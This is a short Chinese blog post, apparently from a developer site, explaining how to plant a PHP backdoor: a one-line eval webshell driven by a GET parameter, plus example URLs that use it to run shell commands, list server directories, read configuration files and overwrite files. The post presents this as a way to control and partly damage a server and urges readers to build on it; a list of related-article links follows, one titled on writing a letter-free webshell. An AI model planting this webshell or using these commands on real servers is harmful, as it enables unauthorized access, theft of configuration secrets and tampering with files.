PHP后门的一些用法

简介: 今天我们说一些最常见的PHP留后门的一些用法首先,写一个最简单的后门,也可以叫做木马。

今天我们说一些最常见的PHP留后门的一些用法
首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就酱,你已经获得了这台服务器上的很多执行权限。那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

相关文章
|
17天前
|
PHP
PHP的pcntl多进程用法实例
PHP使用PCNTL系列的函数也能做到多进程处理一个事务。
|
4月前
|
监控 数据库连接 PHP
php中register_shutdown_function函数用法详解
通过 `register_shutdown_function`,PHP开发者可以对脚本的终止进行更精细化的处理,这个函数让开发者能在脚本的生命周期结束时有机会执行最后的操作,无论脚本是正常结束还是发生错误。由于它的高度实用性和灵活性,`register_shutdown_function`是PHP开发中不可或缺的工具之一。
66 0
|
6月前
|
缓存 JSON PHP
蓝易云 - PHP中header()的七种用法
设置HTTP认证:例如,使用Basic认证方式:
38 2
|
7月前
|
PHP
php 常见的判断语句和用法
PHP中的判断语句包括if、else、elseif/else if和switch/case。if检查条件执行相关代码;if...else则在条件真假时执行不同代码块;elseif用于多条件检查;switch根据表达式值匹配case执行相应代码,default处理未匹配情况。
78 1
|
12月前
php@符号的用法简介,错误关闭符号
用在函数前,使不显示错误信息,前面的“@”就能把错误显示给抑制住,也就是不会显示错误,然后再抛出异常,显示自己定义的异常处理,添加这个只是为了让浏览者不看到,不友好的页面,并不能抑制住错误,只能抑制显示错误.
37 0
|
JSON PHP 数据格式
PHP =>、->、::、符号用法与含义
PHP =>、->、::、符号用法与含义
98 0
|
前端开发 中间件 API
PHP - Laravel CSRF 介绍与用法(及取消 CSRF 验证)
PHP - Laravel CSRF 介绍与用法(及取消 CSRF 验证)
247 0
|
SQL JavaScript 前端开发
ChatGPT工作提效之在程序开发中的巧劲和指令(创建MySQL语句、PHP语句、Javascript用法、python的交互)
ChatGPT工作提效之在程序开发中的巧劲和指令(创建MySQL语句、PHP语句、Javascript用法、python的交互)
219 0
|
关系型数据库 MySQL PHP
php将数组转化成拼接IN字符串实现mysql使用where in 用法
php将数组转化成拼接IN字符串实现mysql使用where in 用法
78 0
|
Linux PHP
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)
119 0
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)